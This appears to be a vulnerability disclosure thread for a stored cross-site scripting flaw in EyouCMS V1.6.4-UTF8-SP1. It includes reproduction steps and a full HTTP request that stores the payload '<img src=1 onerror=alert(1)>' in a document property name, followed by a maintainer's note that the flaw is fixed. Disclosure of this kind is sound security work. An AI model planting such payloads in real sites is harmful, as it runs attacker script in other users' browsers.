EyouCMS-V1.6.4-UTF8-SP1 has a vulnerability, Stored Cross-Site Scripting

[DiliLearngent]

Version:
<=EyouCMS-V1.6.4-UTF8-SP1

Description:

1. Log in to the backend with an administrator account, click on "Function Map" and add "Document Properties".
   
2. Select "Document Properties" and change the name of one of the properties to <img src=1 onerror=alert(1).
   

   POST /EyouCMS/login.php?m=admin&c=Index&a=changeTableVal&_ajax=1&lang=cn HTTP/1.1
   Host: 192.168.3.135
   Content-Length: 100
   Accept: application/json, text/javascript, */*; q=0.01
   X-Requested-With: XMLHttpRequest
   User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
   Content-Type: application/x-www-form-urlencoded; charset=UTF-8
   Origin: http://192.168.3.135
   Referer: http://192.168.3.135/EyouCMS/login.php?m=admin&c=ArchivesFlag&a=index&lang=cn
   Accept-Encoding: gzip, deflate
   Accept-Language: zh-CN,zh;q=0.9
   Cookie: home_lang=cn; admin_lang=cn; PHPSESSID=1mvmqpf2r3tteku8fbf3bu1to6; ENV_UPHTML_AFTER=%7B%22seo_uphtml_after_home%22%3A0%2C%22seo_uphtml_after_channel%22%3A%221%22%2C%22seo_uphtml_after_pernext%22%3A%221%22%7D; users_id=1; admin-arctreeClicked-Arr=%5B%5D; admin-treeClicked-Arr=%5B%5D; ENV_IS_UPHTML=0; ENV_GOBACK_URL=%2FEyouCMS%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_archives%26lang%3Dcn; ENV_LIST_URL=%2FEyouCMS%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_archives%26lang%3Dcn; workspaceParam=index%7CArchivesFlag
   Connection: close
   
   table=archives_flag&id_name=id&id_value=1&field=flag_name&value=<img src=1 onerror=alert(1)>
   

3. Choose "Content Management", select an article at random, click "Edit" and a pop-up window will appear.
   
   The principle is the same as EyouCMS-V1.6.4-UTF8-SP1 has a vulnerability, Stored Cross-Site Scripting #52.

[weng-xianhu]

Thank you for your feedback. It has been fixed